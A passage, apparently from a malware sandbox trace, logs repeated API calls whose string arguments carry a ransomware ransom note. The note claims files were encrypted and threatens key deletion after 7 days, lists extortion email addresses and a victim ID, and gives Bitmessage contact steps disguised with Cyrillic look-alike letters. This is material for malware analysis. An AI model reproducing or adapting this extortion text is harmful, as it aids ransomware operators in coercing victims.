we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0267.742] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0267.742] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x3963c28, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" 